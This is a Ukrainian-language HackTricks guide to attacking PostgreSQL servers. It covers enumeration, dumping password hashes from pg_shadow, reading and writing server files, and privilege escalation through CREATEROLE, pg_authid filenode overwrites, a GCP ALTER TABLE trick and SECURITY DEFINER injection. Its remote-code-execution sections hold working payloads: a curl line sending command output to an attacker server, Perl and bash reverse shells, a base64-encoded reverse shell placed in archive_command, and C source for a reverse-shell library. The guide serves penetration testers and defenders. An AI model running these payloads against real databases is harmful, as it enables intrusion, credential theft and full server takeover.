hacktricks/network-services-pentesting/pentesting-postgresql.md

50 KiB
Raw Blame History

5432,5433 - Pentesting Postgresql


Використовуйте Trickest для легкого створення та автоматизації робочих процесів, підтримуваних найсучаснішими інструментами спільноти.
Отримайте доступ сьогодні:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pentesting-postgresql" %}

{% hint style="success" %} Вчіться та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вчіться та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримайте HackTricks
{% endhint %}

Основна інформація

PostgreSQL описується як об'єктно-реляційна система управління базами даних, яка є відкритим кодом. Ця система не лише використовує мову SQL, але й покращує її додатковими функціями. Її можливості дозволяють обробляти широкий спектр типів даних та операцій, що робить її універсальним вибором для розробників та організацій.

Порт за замовчуванням: 5432, і якщо цей порт вже використовується, то, здається, postgresql використовуватиме наступний порт (ймовірно, 5433), який не використовується.

PORT     STATE SERVICE
5432/tcp open  pgsql

Підключення та базове перерахування

psql -U <myuser> # Open psql console with user
psql -h <host> -U <username> -d <database> # Remote connection
psql -h <host> -p <port> -U <username> -W <password> <database> # Remote connection
psql -h localhost -d <database_name> -U <User> #Password will be prompted
\list # List databases
\c <database> # use the database
\d # List tables
\du+ # Get users roles

# Get current user
SELECT user;

# Get current database
SELECT current_catalog;

# List schemas
SELECT schema_name,schema_owner FROM information_schema.schemata;
\dn+

#List databases
SELECT datname FROM pg_database;

#Read credentials (usernames + pwd hash)
SELECT usename, passwd from pg_shadow;

# Get languages
SELECT lanname,lanacl FROM pg_language;

# Show installed extensions
SHOW rds.extensions;
SELECT * FROM pg_extension;

# Get history of commands executed
\s

{% hint style="warning" %} Якщо при виконанні \list ви знайдете базу даних під назвою rdsadmin, ви знаєте, що ви всередині AWS postgresql database. {% endhint %}

Для отримання додаткової інформації про як зловживати PostgreSQL базою даних дивіться:

{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/" %} postgresql-injection {% endcontent-ref %}

Автоматичне перерахування

msf> use auxiliary/scanner/postgres/postgres_version
msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection

Brute force

Сканування портів

Згідно з цим дослідженням, коли спроба підключення не вдається, dblink викидає виключення sqlclient_unable_to_establish_sqlconnection, яке містить пояснення помилки. Приклади цих деталей наведені нижче.

SELECT * FROM dblink_connect('host=1.2.3.4
port=5678
user=name
password=secret
dbname=abc
connect_timeout=10');
  • Хост недоступний

ДЕТАЛІ: не вдалося підключитися до сервера: Немає маршруту до хоста. Чи працює сервер на хості "1.2.3.4" і приймає TCP/IP з'єднання на порту 5678?

  • Порт закритий
DETAIL:  could not connect to server: Connection refused Is  the  server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
  • Порт відкритий
DETAIL:  server closed the connection unexpectedly This  probably  means
the server terminated abnormally before or while processing the request

or

DETAIL:  FATAL:  password authentication failed for user "name"
  • Порт відкритий або фільтрується
DETAIL:  could not connect to server: Connection timed out Is the server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?

У функціях PL/pgSQL наразі неможливо отримати деталі виключень. Однак, якщо у вас є прямий доступ до сервера PostgreSQL, ви можете отримати необхідну інформацію. Якщо витягти імена користувачів та паролі з системних таблиць неможливо, ви можете розглянути можливість використання методу атаки зі словником, обговореного в попередньому розділі, оскільки це може дати позитивні результати.

Перерахування Привілеїв

Ролі

Типи Ролей
rolsuper Роль має привілеї суперкористувача
rolinherit Роль автоматично успадковує привілеї ролей, членом яких вона є
rolcreaterole Роль може створювати більше ролей
rolcreatedb Роль може створювати бази даних
rolcanlogin Роль може увійти в систему. Тобто, цю роль можна використовувати як початковий ідентифікатор авторизації сесії
rolreplication Роль є роллю реплікації. Роль реплікації може ініціювати з'єднання реплікації та створювати і видаляти слоти реплікації.
rolconnlimit Для ролей, які можуть увійти в систему, це встановлює максимальну кількість одночасних з'єднань, які може зробити ця роль. -1 означає без обмежень.
rolpassword Не пароль (завжди читається як ********)
rolvaliduntil Час закінчення терміну дії пароля (використовується лише для аутентифікації за паролем); null, якщо немає терміну дії
rolbypassrls Роль обходить кожну політику безпеки на рівні рядка, див. Розділ 5.8 для отримання додаткової інформації.
rolconfig Специфічні для ролі значення за замовчуванням для змінних конфігурації під час виконання
oid ID ролі

Цікаві Групи

  • Якщо ви є членом pg_execute_server_program, ви можете виконувати програми
  • Якщо ви є членом pg_read_server_files, ви можете читати файли
  • Якщо ви є членом pg_write_server_files, ви можете писати файли

{% hint style="info" %} Зверніть увагу, що в Postgres користувач, група та роль є одним і тим же. Це залежить від того, як ви це використовуєте і чи дозволяєте їй входити в систему. {% endhint %}

# Get users roles
\du

#Get users roles & groups
# r.rolpassword
# r.rolconfig,
SELECT
r.rolname,
r.rolsuper,
r.rolinherit,
r.rolcreaterole,
r.rolcreatedb,
r.rolcanlogin,
r.rolbypassrls,
r.rolconnlimit,
r.rolvaliduntil,
r.oid,
ARRAY(SELECT b.rolname
FROM pg_catalog.pg_auth_members m
JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)
WHERE m.member = r.oid) as memberof
, r.rolreplication
FROM pg_catalog.pg_roles r
ORDER BY 1;

# Check if current user is superiser
## If response is "on" then true, if "off" then false
SELECT current_setting('is_superuser');

# Try to grant access to groups
## For doing this you need to be admin on the role, superadmin or have CREATEROLE role (see next section)
GRANT pg_execute_server_program TO "username";
GRANT pg_read_server_files TO "username";
GRANT pg_write_server_files TO "username";
## You will probably get this error:
## Cannot GRANT on the "pg_write_server_files" role without being a member of the role.

# Create new role (user) as member of a role (group)
CREATE ROLE u LOGIN PASSWORD 'lriohfugwebfdwrr' IN GROUP pg_read_server_files;
## Common error
## Cannot GRANT on the "pg_read_server_files" role without being a member of the role.

Таблиці

# Get owners of tables
select schemaname,tablename,tableowner from pg_tables;
## Get tables where user is owner
select schemaname,tablename,tableowner from pg_tables WHERE tableowner = 'postgres';

# Get your permissions over tables
SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants;

#Check users privileges over a table (pg_shadow on this example)
## If nothing, you don't have any permission
SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants WHERE table_name='pg_shadow';

Функції

# Interesting functions are inside pg_catalog
\df * #Get all
\df *pg_ls* #Get by substring
\df+ pg_read_binary_file #Check who has access

# Get all functions of a schema
\df pg_catalog.*

# Get all functions of a schema (pg_catalog in this case)
SELECT routines.routine_name, parameters.data_type, parameters.ordinal_position
FROM information_schema.routines
LEFT JOIN information_schema.parameters ON routines.specific_name=parameters.specific_name
WHERE routines.specific_schema='pg_catalog'
ORDER BY routines.routine_name, parameters.ordinal_position;

# Another aparent option
SELECT * FROM pg_proc;

File-system actions

Read directories and files

З цього коміту члени визначеної DEFAULT_ROLE_READ_SERVER_FILES групи (названої pg_read_server_files) та суперкористувачі можуть використовувати метод COPY на будь-якому шляху (перевірте convert_and_check_filename у genfile.c):

# Read file
CREATE TABLE demo(t text);
COPY demo from '/etc/passwd';
SELECT * FROM demo;

{% hint style="warning" %} Пам'ятайте, що якщо ви не є суперкористувачем, але маєте права CREATEROLE, ви можете додати себе до цього групи:

GRANT pg_read_server_files TO username;

Більше інформації. {% endhint %}

Існують інші функції postgres, які можна використовувати для читання файлів або переліку директорій. Тільки суперкористувачі та користувачі з явними дозволами можуть їх використовувати:

# Before executing these function go to the postgres DB (not in the template1)
\c postgres
## If you don't do this, you might get "permission denied" error even if you have permission

select * from pg_ls_dir('/tmp');
select * from pg_read_file('/etc/passwd', 0, 1000000);
select * from pg_read_binary_file('/etc/passwd');

# Check who has permissions
\df+ pg_ls_dir
\df+ pg_read_file
\df+ pg_read_binary_file

# Try to grant permissions
GRANT EXECUTE ON function pg_catalog.pg_ls_dir(text) TO username;
# By default you can only access files in the datadirectory
SHOW data_directory;
# But if you are a member of the group pg_read_server_files
# You can access any file, anywhere
GRANT pg_read_server_files TO username;
# Check CREATEROLE privilege escalation

Ви можете знайти більше функцій в https://www.postgresql.org/docs/current/functions-admin.html

Просте записування файлів

Тільки суперкористувачі та члени pg_write_server_files можуть використовувати copy для запису файлів.

{% code overflow="wrap" %}

copy (select convert_from(decode('<ENCODED_PAYLOAD>','base64'),'utf-8')) to '/just/a/path.exec';

{% endcode %}

{% hint style="warning" %} Пам'ятайте, що якщо ви не є суперкористувачем, але маєте права CREATEROLE, ви можете додати себе до цієї групи:

GRANT pg_write_server_files TO username;

Більше інформації. {% endhint %}

Пам'ятайте, що COPY не може обробляти символи нового рядка, тому навіть якщо ви використовуєте корисне навантаження base64, вам потрібно надіслати однорядковий запит.
Дуже важливе обмеження цієї техніки полягає в тому, що copy не може бути використаний для запису бінарних файлів, оскільки він змінює деякі бінарні значення.

Завантаження бінарних файлів

Однак існують інші техніки для завантаження великих бінарних файлів:

{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md" %} big-binary-files-upload-postgresql.md {% endcontent-ref %}

Порада для баг-баунті: зареєструйтесь на Intigriti, преміум платформі для баг-баунті, створеній хакерами для хакерів! Приєднуйтесь до нас на https://go.intigriti.com/hacktricks сьогодні та почніть заробляти винагороди до $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

Оновлення даних таблиці PostgreSQL через запис локального файлу

Якщо у вас є необхідні дозволи для читання та запису файлів сервера PostgreSQL, ви можете оновити будь-яку таблицю на сервері, перезаписавши відповідний файл вузла в каталозі даних PostgreSQL. Більше про цю техніку тут.

Необхідні кроки:

  1. Отримайте каталог даних PostgreSQL
SELECT setting FROM pg_settings WHERE name = 'data_directory';

Примітка: Якщо ви не можете отримати поточний шлях до каталогу даних з налаштувань, ви можете запитати основну версію PostgreSQL через запит SELECT version() і спробувати перебрати шлях. Загальні шляхи до каталогу даних на Unix-інсталяціях PostgreSQL: /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/. Загальне ім'я кластера - main. 2. Отримайте відносний шлях до файлу вузла, пов'язаного з цільовою таблицею

SELECT pg_relation_filepath('{TABLE_NAME}')

Цей запит повинен повернути щось на зразок base/3/1337. Повний шлях на диску буде $DATA_DIRECTORY/base/3/1337, тобто /var/lib/postgresql/13/main/base/3/1337. 3. Завантажте файл вузла через функції lo_*

SELECT lo_import('{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}',13337)
  1. Отримайте тип даних, пов'язаний з цільовою таблицею
SELECT
STRING_AGG(
CONCAT_WS(
',',
attname,
typname,
attlen,
attalign
),
';'
)
FROM pg_attribute
JOIN pg_type
ON pg_attribute.atttypid = pg_type.oid
JOIN pg_class
ON pg_attribute.attrelid = pg_class.oid
WHERE pg_class.relname = '{TABLE_NAME}';
  1. Використовуйте PostgreSQL Filenode Editor для редагування файлу вузла; встановіть всі булеві прапори rol* на 1 для повних прав.
python3 postgresql_filenode_editor.py -f {FILENODE} --datatype-csv {DATATYPE_CSV_FROM_STEP_4} -m update -p 0 -i ITEM_ID --csv-data {CSV_DATA}

Демонстрація PostgreSQL Filenode Editor 6. Повторно завантажте відредагований файл вузла через функції lo_* і перезапишіть оригінальний файл на диску

SELECT lo_from_bytea(13338,decode('{BASE64_ENCODED_EDITED_FILENODE}','base64'))
SELECT lo_export(13338,'{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}')
  1. (Опціонально) Очистіть кеш таблиці в пам'яті, запустивши витратний SQL-запит
SELECT lo_from_bytea(133337, (SELECT REPEAT('a', 128*1024*1024))::bytea)
  1. Тепер ви повинні бачити оновлені значення таблиці в PostgreSQL.

Ви також можете стати суперадміністратором, редагуючи таблицю pg_authid. Дивіться наступний розділ.

RCE

RCE до програми

Оскільки версія 9.3, тільки суперкористувачі та члени групи pg_execute_server_program можуть використовувати copy для RCE (приклад з ексфільтрацією:

'; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- -

Приклад для exec:

#PoC
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;

#Reverse shell
#Notice that in order to scape a single quote you need to put 2 single quotes
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';

{% hint style="warning" %} Пам'ятайте, що якщо ви не є суперкористувачем, але маєте права CREATEROLE, ви можете додати себе до цієї групи:

GRANT pg_execute_server_program TO username;

Більше інформації. {% endhint %}

Або використовуйте модуль multi/postgres/postgres_copy_from_program_cmd_exec з metasploit.
Більше інформації про цю вразливість тут. Хоча це було зареєстровано як CVE-2019-9193, Postges оголосив, що це функція і не буде виправлено.

RCE з мовами PostgreSQL

{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md" %} rce-with-postgresql-languages.md {% endcontent-ref %}

RCE з розширеннями PostgreSQL

Якщо ви навчилися з попереднього посту як завантажувати бінарні файли, ви можете спробувати отримати RCE, завантажуючи розширення postgresql і завантажуючи його.

{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md" %} rce-with-postgresql-extensions.md {% endcontent-ref %}

RCE з конфігураційного файлу PostgreSQL

{% hint style="info" %} Наступні вектори RCE особливо корисні в обмежених контекстах SQLi, оскільки всі кроки можуть бути виконані через вкладені оператори SELECT {% endhint %}

Конфігураційний файл PostgreSQL є записуваним користувачем postgres, який запускає базу даних, тому як суперкористувач, ви можете записувати файли в файловій системі, а отже, ви можете перезаписати цей файл.

RCE з ssl_passphrase_command

Більше інформації про цю техніку тут.

Конфігураційний файл має кілька цікавих атрибутів, які можуть призвести до RCE:

  • ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key' Шлях до приватного ключа бази даних
  • ssl_passphrase_command = '' Якщо приватний файл захищений паролем (шифрований), postgresql виконає команду, вказану в цьому атрибуті.
  • ssl_passphrase_command_supports_reload = off Якщо цей атрибут включений, команда, що виконується, якщо ключ захищений паролем, буде виконана під час виконання pg_reload_conf().

Отже, зловмиснику потрібно:

  1. Скинути приватний ключ з сервера
  2. Зашифрувати завантажений приватний ключ:
  3. rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
  4. Перезаписати
  5. Скинути поточну конфігурацію postgresql
  6. Перезаписати конфігурацію з вказаними атрибутами:
  7. ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
  8. ssl_passphrase_command_supports_reload = on
  9. Виконати pg_reload_conf()

Під час тестування я помітив, що це буде працювати лише якщо файл приватного ключа має привілеї 640, він належить root і групі ssl-cert або postgres (щоб користувач postgres міг його читати), і розміщений у /var/lib/postgresql/12/main.

RCE з archive_command

Більше інформації про цю конфігурацію та про WAL тут.

Ще один атрибут у конфігураційному файлі, який можна експлуатувати, це archive_command.

Для цього archive_mode має бути 'on' або 'always'. Якщо це правда, то ми можемо перезаписати команду в archive_command і змусити її виконатися через операції WAL (журнал попереднього запису).

Загальні кроки:

  1. Перевірте, чи увімкнено режим архівування: SELECT current_setting('archive_mode')
  2. Перезапишіть archive_command з корисним навантаженням. Наприклад, зворотний шелл: archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'
  3. Перезавантажте конфігурацію: SELECT pg_reload_conf()
  4. Примусьте операцію WAL виконатися, що викличе команду архівування: SELECT pg_switch_wal() або SELECT pg_switch_xlog() для деяких версій Postgres

RCE з попередньо завантаженими бібліотеками

Більше інформації про цю техніку тут.

Цей вектор атаки використовує наступні змінні конфігурації:

  • session_preload_libraries -- бібліотеки, які будуть завантажені сервером PostgreSQL під час підключення клієнта.
  • dynamic_library_path -- список директорій, де сервер PostgreSQL шукатиме бібліотеки.

Ми можемо встановити значення dynamic_library_path на директорію, записувану користувачем postgres, що запускає базу даних, наприклад, директорію /tmp/, і завантажити туди шкідливий об'єкт .so. Далі ми змусимо сервер PostgreSQL завантажити нашу нову бібліотеку, включивши її в змінну session_preload_libraries.

Кроки атаки:

  1. Завантажте оригінальний postgresql.conf
  2. Включіть директорію /tmp/ у значення dynamic_library_path, наприклад, dynamic_library_path = '/tmp:$libdir'
  3. Включіть ім'я шкідливої бібліотеки в значення session_preload_libraries, наприклад, session_preload_libraries = 'payload.so'
  4. Перевірте основну версію PostgreSQL за допомогою запиту SELECT version()
  5. Скомпілюйте код шкідливої бібліотеки з правильним пакетом розробника PostgreSQL Приклад коду:
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "postgres.h"
#include "fmgr.h"

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

void _init() {
/*
код взятий з https://www.revshells.com/
*/

int port = REVSHELL_PORT;
struct sockaddr_in revsockaddr;

int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("REVSHELL_IP");

connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);

char * const argv[] = {"/bin/bash", NULL};
execve("/bin/bash", argv, NULL);
}

Компілірування коду:

gcc -I$(pg_config --includedir-server) -shared -fPIC -nostartfiles -o payload.so payload.c
  1. Завантажте шкідливий postgresql.conf, створений на етапах 2-3, і перезапишіть оригінальний
  2. Завантажте payload.so з етапу 5 у директорію /tmp
  3. Перезавантажте конфігурацію сервера, перезапустивши сервер або викликавши запит SELECT pg_reload_conf()
  4. При наступному підключенні до БД ви отримаєте зворотне з'єднання шеллу.

Підвищення привілеїв Postgres

Підвищення привілеїв CREATEROLE

Надання

Згідно з документацією: Ролі, що мають привілей CREATEROLE, можуть надавати або відкликати членство в будь-якій ролі, яка не є суперкористувачем.

Отже, якщо у вас є дозвіл CREATEROLE, ви можете надати собі доступ до інших ролей (які не є суперкористувачами), що можуть дати вам можливість читати та записувати файли та виконувати команди:

# Access to execute commands
GRANT pg_execute_server_program TO username;
# Access to read files
GRANT pg_read_server_files TO username;
# Access to write files
GRANT pg_write_server_files TO username;

Змінити пароль

Користувачі з цією роллю також можуть змінювати паролі інших не-суперкористувачів:

#Change password
ALTER USER user_name WITH PASSWORD 'new_password';

Privesc to SUPERUSER

Досить поширено, що локальні користувачі можуть входити в PostgreSQL без надання будь-якого пароля. Тому, як тільки ви отримали дозволи на виконання коду, ви можете зловживати цими дозволами, щоб надати собі роль SUPERUSER:

COPY (select '') to PROGRAM 'psql -U <super_user> -c "ALTER USER <your_username> WITH SUPERUSER;"';

{% hint style="info" %} Це зазвичай можливо через наступні рядки у файлі pg_hba.conf:

# "local" is for Unix domain socket connections only
local   all             all                                     trust
# IPv4 local connections:
host    all             all             127.0.0.1/32            trust
# IPv6 local connections:
host    all             all             ::1/128                 trust

{% endhint %}

ALTER TABLE privesc

У цьому звіті пояснюється, як було можливим privesc у Postgres GCP, зловживаючи привілеєм ALTER TABLE, який був наданий користувачу.

Коли ви намагаєтеся зробити іншого користувача власником таблиці, ви повинні отримати помилку, яка цьому заважає, але, очевидно, GCP надала цю опцію не-суперкористувачу postgres в GCP:

Поєднуючи цю ідею з тим фактом, що коли команди INSERT/UPDATE/ANALYZE виконуються на таблиці з функцією індексу, функція викликається як частина команди з дозволами власника таблиці. Можливо створити індекс з функцією та надати дозволи власника суперкористувачу над цією таблицею, а потім виконати ANALYZE над таблицею з шкідливою функцією, яка зможе виконувати команди, оскільки використовує привілеї власника.

GetUserIdAndSecContext(&save_userid, &save_sec_context);
SetUserIdAndSecContext(onerel->rd_rel->relowner,
save_sec_context | SECURITY_RESTRICTED_OPERATION);

Exploitation

  1. Почніть з створення нової таблиці.
  2. Вставте деякий нерелевантний контент у таблицю, щоб надати дані для функції індексації.
  3. Розробіть шкідливу функцію індексації, яка містить код виконання, що дозволяє виконувати несанкціоновані команди.
  4. Змініть власника таблиці на "cloudsqladmin", що є роллю суперкористувача GCP, яка використовується виключно Cloud SQL для управління та обслуговування бази даних.
  5. Виконайте операцію ANALYZE на таблиці. Ця дія змушує движок PostgreSQL перейти в контекст користувача власника таблиці, "cloudsqladmin". Внаслідок цього шкідлива функція індексації викликається з правами "cloudsqladmin", що дозволяє виконання раніше несанкціонованої команди оболонки.

In PostgreSQL, this flow looks something like this:

CREATE TABLE temp_table (data text);
CREATE TABLE shell_commands_results (data text);

INSERT INTO temp_table VALUES ('dummy content');

/* PostgreSQL does not allow creating a VOLATILE index function, so first we create IMMUTABLE index function */
CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text
LANGUAGE sql IMMUTABLE AS 'select ''nothing'';';

CREATE INDEX index_malicious ON public.temp_table (suid_function(data));

ALTER TABLE temp_table OWNER TO cloudsqladmin;

/* Replace the function with VOLATILE index function to bypass the PostgreSQL restriction */
CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text
LANGUAGE sql VOLATILE AS 'COPY public.shell_commands_results (data) FROM PROGRAM ''/usr/bin/id''; select ''test'';';

ANALYZE public.temp_table;

Тоді таблиця shell_commands_results міститиме вихідні дані виконаного коду:

uid=2345(postgres) gid=2345(postgres) groups=2345(postgres)

Local Login

Деякі неправильно налаштовані екземпляри postgresql можуть дозволяти вхід будь-якого локального користувача, можливо локально з 127.0.0.1, використовуючи dblink function:

\du * # Get Users
\l    # Get databases
SELECT * FROM dblink('host=127.0.0.1
port=5432
user=someuser
password=supersecret
dbname=somedb',
'SELECT usename,passwd from pg_shadow')
RETURNS (result TEXT);

{% hint style="warning" %} Зверніть увагу, що для роботи попереднього запиту функція dblink повинна існувати. Якщо її немає, ви можете спробувати створити її за допомогою

CREATE EXTENSION dblink;

{% endhint %}

Якщо у вас є пароль користувача з більшими привілеями, але цьому користувачу не дозволено входити з зовнішньої IP-адреси, ви можете використовувати наступну функцію для виконання запитів від імені цього користувача:

SELECT * FROM dblink('host=127.0.0.1
user=someuser
dbname=somedb',
'SELECT usename,passwd from pg_shadow')
RETURNS (result TEXT);

Можна перевірити, чи існує ця функція за допомогою:

SELECT * FROM pg_proc WHERE proname='dblink' AND pronargs=2;

Користувацька визначена функція з SECURITY DEFINER

У цьому звіті пентестери змогли підвищити привілеї всередині екземпляра postgres, наданого IBM, тому що вони знайшли цю функцію з прапором SECURITY DEFINER:

CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text)
RETURNS text
LANGUAGE 'plpgsql'
    VOLATILE SECURITY DEFINER
    PARALLEL UNSAFE
COST 100

AS $BODY$
DECLARE
persist_dblink_extension boolean;
BEGIN
persist_dblink_extension := create_dblink_extension();
PERFORM dblink_connect(format('dbname=%s', db_name));
PERFORM dblink_exec(format('CREATE SUBSCRIPTION %s CONNECTION ''host=%s port=%s password=%s user=%s dbname=%s sslmode=require'' PUBLICATION %s',
subscription_name, host_ip, portNum, password, username, db_name, publisher_name));
PERFORM dblink_disconnect();
…

Як пояснено в документації, функція з SECURITY DEFINER виконується з привілеями користувача, який її володіє. Тому, якщо функція вразлива до SQL Injection або виконує деякі привілейовані дії з параметрами, контрольованими атакуючим, її можна зловживати для ескалації привілеїв всередині postgres.

У рядку 4 попереднього коду ви можете побачити, що функція має прапор SECURITY DEFINER.

CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a
user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication
WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);

And then виконати команди:

Проходження Брутфорсу з PL/pgSQL

PL/pgSQL - це повнофункціональна мова програмування, яка пропонує більший процедурний контроль у порівнянні з SQL. Вона дозволяє використовувати цикли та інші структури управління для покращення логіки програми. Крім того, SQL-інструкції та тригери мають можливість викликати функції, створені за допомогою мови PL/pgSQL. Ця інтеграція дозволяє більш комплексний і універсальний підхід до програмування бази даних та автоматизації.
Ви можете зловживати цією мовою, щоб попросити PostgreSQL брутфорсити облікові дані користувачів.

{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md" %} pl-pgsql-password-bruteforce.md {% endcontent-ref %}

Привілеї через Перезапис Внутрішніх Таблиць PostgreSQL

{% hint style="info" %} Наступний вектор привілеїв особливо корисний у обмежених контекстах SQLi, оскільки всі кроки можна виконати через вкладені SELECT-інструкції {% endhint %}

Якщо ви можете читати та писати файли сервера PostgreSQL, ви можете стати суперкористувачем, перезаписавши файловий вузол PostgreSQL на диску, пов'язаний з внутрішньою таблицею pg_authid.

Дізнайтеся більше про цю техніку тут.

Кроки атаки:

  1. Отримати каталог даних PostgreSQL
  2. Отримати відносний шлях до файлового вузла, пов'язаного з таблицею pg_authid
  3. Завантажити файловий вузол через функції lo_*
  4. Отримати тип даних, пов'язаний з таблицею pg_authid
  5. Використати Редактор Файлових Вузлів PostgreSQL, щоб редагувати файловий вузол; встановити всі булеві прапори rol* на 1 для повних прав.
  6. Повторно завантажити відредагований файловий вузол через функції lo_* і перезаписати оригінальний файл на диску
  7. (Опційно) Очистити кеш таблиці в пам'яті, запустивши витратний SQL-запит
  8. Тепер ви повинні мати привілеї повного супер адміністратора.

POST

msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> use auxiliary/admin/postgres/postgres_readfile
msf> use exploit/linux/postgres/postgres_payload
msf> use exploit/windows/postgres/postgres_payload

logging

Всередині файлу postgresql.conf ви можете увімкнути журнали postgresql, змінивши:

log_statement = 'all'
log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log'
logging_collector = on
sudo service postgresql restart
#Find the logs in /var/lib/postgresql/<PG_Version>/main/log/
#or in /var/lib/postgresql/<PG_Version>/main/pg_log/

Тоді, перезапустіть сервіс.

pgadmin

pgadmin - це платформа для адміністрування та розробки для PostgreSQL.
Ви можете знайти паролі всередині файлу pgadmin4.db
Ви можете розшифрувати їх, використовуючи функцію decrypt всередині скрипта: https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py

sqlite3 pgadmin4.db ".schema"
sqlite3 pgadmin4.db "select * from user;"
sqlite3 pgadmin4.db "select * from server;"
string pgadmin4.db

pg_hba

Аутентифікація клієнтів у PostgreSQL керується через конфігураційний файл під назвою pg_hba.conf. Цей файл містить серію записів, кожен з яких вказує тип з'єднання, діапазон IP-адрес клієнтів (якщо застосовно), назву бази даних, ім'я користувача та метод аутентифікації, який слід використовувати для відповідності з'єднанням. Перший запис, який відповідає типу з'єднання, адресі клієнта, запитуваній базі даних та імені користувача, використовується для аутентифікації. Немає резервного варіанту, якщо аутентифікація не вдалася. Якщо жоден запис не відповідає, доступ заборонено.

Доступні методи аутентифікації на основі паролів у pg_hba.conf - це md5, crypt та password. Ці методи відрізняються тим, як передається пароль: MD5-хешований, crypt-зашифрований або у відкритому тексті. Важливо зазначити, що метод crypt не може бути використаний з паролями, які були зашифровані в pg_authid.

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}


Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pentesting-postgresql" %}